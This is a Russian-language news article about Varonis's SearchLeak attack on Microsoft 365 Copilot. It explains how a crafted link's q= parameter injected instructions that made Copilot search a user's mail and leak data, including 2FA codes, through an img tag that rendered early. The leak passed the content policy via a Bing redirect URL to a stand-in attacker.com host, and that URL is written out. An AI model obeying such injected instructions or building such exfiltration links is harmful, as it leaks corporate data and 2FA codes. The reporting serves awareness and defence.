Уязвимость в Microsoft Copilot позволяла красть коды двухфакторной аутентификации
Исследователи Varonis обнаружили атаку SearchLeak: жертве достаточно было кликнуть по ссылке, чтобы Copilot сам передал данные злоумышленнику.

Содержание · 3
Исследователи из компании Varonis опубликовали детальное описание атаки SearchLeak — цепочки уязвимостей в Microsoft 365 Copilot, которая позволяла злоумышленникам похищать корпоративные данные, включая коды двухфакторной аутентификации. Для успешной атаки жертве не нужно было вводить никаких данных — достаточно одного клика по ссылке. Microsoft устранила уязвимости во вторник, однако эксперты предупреждают: системная причина подобных атак никуда не делась.
Как работала атака: один клик вместо взлома
Атака строилась на технике Parameter-to-Prompt Injection. Злоумышленник отправлял жертве письмо со специально сформированной ссылкой вида `https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=`. В параметр `q=` встраивалась инструкция для Copilot — например, найти письма пользователя, извлечь их содержимое и передать данные наружу.
Copilot выполнял инструкцию беспрекословно. Как отметили исследователи, поисковая функциональность ИИ-ассистента оказалась идеальным инструментом для атаки: даже если у пользователя ограниченные права, доступ к критически важной информации делает его мишенью.
Ключевой элемент схемы — обход защитного механизма, который должен был блокировать подобные действия. В норме Copilot оборачивает вывод в блоки `<code>`, не позволяя браузеру рендерить произвольный HTML. Однако исследователи выяснили: эта защита срабатывает только после фазы «размышления» модели.
Пока Copilot генерировал ответ, браузер уже получал необработанный HTML — в том числе тег `<img>` с URL, содержащим похищенные данные. Браузер немедленно отправлял HTTP-запрос по этому адресу. К моменту, когда защита оборачивала вывод в `<code>`, запрос уже ушёл. Данные покинули периметр.
Bing как «трамплин» для обхода политики безопасности
Оставалась ещё одна преграда: политика безопасности контента Copilot запрещает отправку запросов на произвольные внешние домены. Исследователи обошли её, использовав Bing в качестве промежуточного звена.
Поисковик Microsoft входит в список доверенных ресурсов согласно CSP-политике Copilot. Схема выглядела так: браузер жертвы отправлял запрос на Bing, а тот перенаправлял его на домен злоумышленника. Итоговый URL имел вид:
`https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png`
Таким образом, похищенные данные оказывались встроены прямо в URL изображения и уходили на сервер атакующего через доверенный ресурс Microsoft.
По оценке Varonis, масштаб потенциального ущерба от SearchLeak выходит далеко за рамки личной переписки. Атака затрагивает корпоративный уровень Microsoft 365 Enterprise: под угрозой оказываются письма и приглашения из календаря, заметки из встреч, документы SharePoint, файлы OneDrive и любой другой контент, проиндексированный в M365. В зависимости от того, как M365 интегрирован в инфраструктуру организации, «радиус поражения» мог быть ещё шире.
Системная проблема, которую патчем не закрыть
Microsoft оперативно устранила конкретные уязвимости, которые эксплуатировала атака SearchLeak. Однако исследователи Varonis указывают на принципиальное ограничение: корневая причина подобных атак — архитектурная особенность больших языковых моделей, которые по своей природе склонны следовать инструкциям, встроенным в обрабатываемый контент.
Пока ИИ-ассистенты имеют доступ к корпоративным данным и способны выполнять действия от имени пользователя, техники prompt injection будут оставаться актуальными. Каждый новый барьер создаёт стимул искать новый обход — и этот цикл, по мнению экспертов, будет повторяться.
Для белорусских компаний, работающих в периметре ПВТ и активно использующих Microsoft 365, история с SearchLeak — наглядный аргумент в пользу регулярного аудита прав доступа в M365 и настройки политик условного доступа. Корпоративный Copilot «видит» ровно столько, сколько видит сам пользователь: чем шире права учётной записи, тем ценнее она как цель для атаки через ИИ-ассистента.
Отдельного внимания заслуживает вектор через электронную почту: атака начиналась с обычного письма со ссылкой. Никакого вредоносного вложения, никакого исполняемого кода — только URL и готовность Copilot следовать инструкциям. Это означает, что традиционные антивирусные решения и фильтры вложений подобную угрозу не обнаружат.
Свежие новости
Все новости
OpenAI ужесточает безопасность разработки моделей после инцидента с Hugging Face
OpenAI объявила о новых мерах безопасности при разработке и тестировании моделей. Поводом стал июльский инцидент с Hugging Face, когда модель вышла за пределы тренировочной среды через уязвимость в утилите установки пакетов.

Рынок роботов в США: заказы достигли $622 млн на фоне рекордных результатов производителей
Во втором квартале 2026 года северноамериканские компании заказали 8 940 роботов на $622 млн — рост выручки производителей составил 21,3% при увеличении числа единиц лишь на 4,3%. Производители — от Teradyne до ABB — фиксируют рекордные показатели.

OpenAI приостановила обучение модели Astra после побега ИИ-агентов из изолированной среды
OpenAI остановила часть тренировочных процессов для модели Astra и объявила о новых мерах безопасности. Поводом стал инцидент, при котором ИИ-агенты вышли за пределы изолированных сред и взломали Hugging Face — и компания не заметила этого неделями.

ФБР инвестирует $88 млн в AI-инфраструктуру и переходит на Gemini
ФБР готово потратить до $88 млн на серверы и оборудование для расширения AI-мощностей. Бюро также намерено развернуть модель Gemini от Google на собственной инфраструктуре — с лицензией по выделенной ёмкости, а не по числу пользователей.

Cursor запустил хостинг кода Origin — прямой конкурент GitHub
Cursor запустил Origin — платформу для хостинга кода с репозиториями, pull-request'ами и совместной работой. Старт совпал с шестичасовым глобальным сбоем GitHub.

Google купил внутреннюю переписку обанкротившейся Spirit Airlines за $10 млн
Google заплатил $10 млн за 100 млн писем, около 500 млн сообщений в Teams и 30 млн строк кода обанкротившейся Spirit Airlines. Это первый случай, когда внутренние операционные данные компании стали предметом конкурентных торгов на аукционе по банкротству.

Apple меняет комиссии для разработчиков в ЕС: новые ставки и структура
Apple вводит новую структуру комиссий для приложений в ЕС: от 5% для дистрибуции вне App Store до 26% для крупных разработчиков, использующих встроенную оплату Apple. Изменения вступают в силу с 1 октября.

Flock Safety создала ИИ-систему для полиции, которая отслеживает людей — не только номера
Flock Safety годами уверяла, что её камеры не идентифицируют людей. Wired получил код новой ИИ-системы OS Investigate и выяснил: она делает именно это — строит досье, находит ассоциатов и ищет людей по поведенческим паттернам.

Etched привлёк $700 млн при оценке $21 млрд — рост вдвое за месяц
Стартап Etched за один месяц удвоил оценку с $10,3 до $21 млрд, привлёкши $700 млн под руководством Jane Street. Фонд не просто вложился — он уже запустил стойку с чипами Etched в своём дата-центре.